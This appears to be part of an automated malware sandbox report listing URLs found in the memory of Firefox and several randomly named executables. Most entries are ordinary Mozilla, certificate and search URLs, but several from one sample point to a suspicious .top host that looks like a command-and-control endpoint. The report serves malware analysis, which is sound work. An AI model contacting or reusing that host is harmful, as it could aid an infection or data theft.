Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB96A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2875741877.000001DEFABD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressionsp
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFf736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736http://home.twentykx20pt.top/bugEWhhZIPIi
Source: firefox.exe, 0000001C.00000003.2822675345.000001DEF908F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF705F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2728904832.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2812300663.000001DEF05CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2729546937.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF6930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3047167053.000001DEEC13C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC962000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756065289.000001DEF6A89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756197782.000001DEF6AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2847420090.000001DEF6AAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2833254348.000001DEF0316000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2920506033.000001DEF124C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755005207.000001DEF702A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057071342.000001DEEC977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001C.00000003.2923613146.000001DEF11C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulJ
Source: firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.sessionstore.upgradeBackup.maxU
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/parent/ext-
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulcreateNotificationMessageElement/setAle
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 0000001F.00000003.2739221096.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2738035698.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970101056.000001D14F53D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.videolan.org/x264.html
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/autocomplete-richlistitem
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 0000001C.00000003.2904698358.000001DEF249F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF7083000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001C.00000002.3057721005.000001DEECA42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057721005.000001DEECA28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/enhancer-for-youtube/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/facebook-container/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/reddit-enhancement-suite/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/to-google-translate/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/firefox/addon/wikipedia-context-menu-search/
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads-us.rd.linksynergy.com/as.php
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
